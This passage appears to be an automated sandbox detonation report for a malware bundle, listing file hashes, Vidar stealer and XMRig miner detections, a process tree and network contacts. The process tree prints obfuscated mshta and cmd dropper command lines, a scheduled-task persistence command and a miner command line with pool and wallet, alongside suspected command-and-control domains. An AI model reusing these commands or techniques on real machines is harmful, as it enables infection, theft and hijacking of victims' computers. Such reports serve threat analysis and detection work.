memory/1832-134-0x00000000008C0000-0x00000000008C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
memory/2948-111-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
memory/1072-143-0x00000000009B0000-0x0000000000A20000-memory.dmp
memory/2652-140-0x0000000000A00000-0x0000000000A16000-memory.dmp
memory/2816-139-0x0000000001300000-0x0000000001372000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PJTNEGBYNN4IUXD59UYU.temp
| MD5 | aeb0ebed9ca31f56d1b50221cf5c08e0 |
| SHA1 | 561ed7f32a0e2bf401ec81f6ba3e7a2c0ea0dbab |
| SHA256 | dfc707852c87f4bb93e9e9594f581517cc1f97b8ffd46191b4af279fd407cdcc |
| SHA512 | ffa93eff2207b6af479ef1d9fda297dd4f64f3aa97a726e8dcd9c746123af3611995feb4657d7edd789dd99a2cf752e7be5b6a0bb2a6aaf250e6bceb82bcbcff |
memory/2408-138-0x0000000000E30000-0x0000000000EA0000-memory.dmp
memory/1648-152-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2948-154-0x0000000000400000-0x0000000000414000-memory.dmp
memory/592-151-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
| MD5 | d165e339ef0c057e20eb61347d06d396 |
| SHA1 | cb508e60292616b22f2d7a5ab8f763e4c89cf448 |
| SHA256 | ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8 |
| SHA512 | da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580 |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe
| MD5 | e90750ecf7d4add59391926ccfc15f51 |
| SHA1 | 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1 |
| SHA256 | b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59 |
| SHA512 | 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9 |
C:\Users\Admin\AppData\Local\Temp\is-TR5KG.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\is-TR5KG.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe
| MD5 | 6b4f4e37bc557393a93d254fe4626bf3 |
| SHA1 | b9950d0223789ae109b43308fcaf93cd35923edb |
| SHA256 | 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d |
| SHA512 | a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e |
memory/2896-82-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2896-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-75-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2896-63-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2652-169-0x0000000000340000-0x0000000000346000-memory.dmp
memory/648-184-0x0000000001E90000-0x0000000001FED000-memory.dmp
memory/2896-193-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-192-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/648-194-0x0000000002A80000-0x0000000002B26000-memory.dmp
memory/2896-191-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2896-189-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2896-186-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2896-185-0x0000000000400000-0x000000000051C000-memory.dmp
memory/648-196-0x0000000002B30000-0x0000000002BC3000-memory.dmp
memory/648-195-0x0000000002B30000-0x0000000002BC3000-memory.dmp
memory/648-198-0x0000000002B30000-0x0000000002BC3000-memory.dmp
memory/2540-211-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-209-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-235-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-234-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-233-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1828-231-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-229-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-227-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1828-237-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-224-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-222-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-221-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-220-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2696-218-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-216-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2696-214-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-208-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-207-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2540-205-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-203-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-201-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2540-199-0x0000000000400000-0x0000000000422000-memory.dmp
memory/900-238-0x0000000000400000-0x0000000002DAA000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240708-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1984 set thread context of 2656 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Jonba.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\f78be40.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cxl-game.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Jonba.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f78be40.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Jonba.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
C:\Users\Admin\AppData\Local\Temp\inst2.exe
"C:\Users\Admin\AppData\Local\Temp\inst2.exe"
C:\Users\Admin\AppData\Local\Temp\4.exe
"C:\Users\Admin\AppData\Local\Temp\4.exe"
C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
"C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp" /SL5="$7021A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
C:\Users\Admin\AppData\Local\Temp\8.exe
"C:\Users\Admin\AppData\Local\Temp\8.exe"
C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp" /SL5="$A0192,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
C:\Users\Admin\AppData\Local\Temp\Jonba.exe
"C:\Users\Admin\AppData\Local\Temp\Jonba.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 1464
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
C:\Users\Admin\AppData\Local\Temp\f78be40.exe
"C:\Users\Admin\AppData\Local\Temp\f78be40.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 536
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | fobe1.com | udp |
| US | 8.8.8.8:53 | www.independent.co.uk | udp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 151.101.65.91:443 | www.independent.co.uk | tcp |
| US | 8.8.8.8:53 | rss.nytimes.com | udp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 8.8.8.8:53 | mas.to | udp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 172.67.166.96:443 | mas.to | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | whealclothing.xyz | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 45.9.20.156:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | my-all-group.bar | udp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 8.8.8.8:53 | m525-blockchain31432.bar | udp |
| US | 151.101.193.164:443 | rss.nytimes.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| GB | 142.250.187.238:80 | www.google-analytics.com | tcp |
| US | 8.8.8.8:53 | s3.tebi.io | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| DE | 159.69.141.93:443 | s3.tebi.io | tcp |
| DE | 159.69.141.93:443 | s3.tebi.io | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| DE | 159.69.141.93:443 | s3.tebi.io | tcp |
| DE | 159.69.141.93:443 | s3.tebi.io | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
